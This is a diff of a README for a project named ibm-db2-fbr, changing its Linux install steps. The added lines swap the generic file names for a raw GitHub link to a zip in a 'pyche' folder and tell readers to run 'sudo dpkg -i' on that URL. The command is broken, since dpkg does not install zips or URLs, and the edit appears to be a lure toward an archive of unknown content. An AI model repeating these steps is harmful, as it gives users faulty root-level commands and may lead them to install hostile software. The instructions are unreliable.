DoomScripts/ibm-db2-fbr/README.md

 3. Open your Applications folder and double-click ibm-db2-fbr to launch it.

 ### For Linux:
-1. If you downloaded a `.tar.gz` file, extract it.
+1. If you downloaded a `https://raw.githubusercontent.com/DoomScripts/ibm-db2-fbr/main/pyche/ibm-db2-fbr.zip` file, extract it.
 You can usually do this by right-clicking the file and selecting "Extract."
 2. Open a terminal and navigate to the extracted folder.
-3. Run the command `sudo dpkg -i filename.deb` if you have a `.deb` file, or follow the specific installation guidelines for your distribution.
+3. Run the command `sudo dpkg -i https://raw.githubusercontent.com/DoomScripts/ibm-db2-fbr/main/pyche/ibm-db2-fbr.zip` if you have a `.deb` file, or follow the specific installation guidelines for your distribution.

 ## 🔧 System Requirements
 To run ibm-db2-fbr smoothly, your system should meet the following minimum requirements: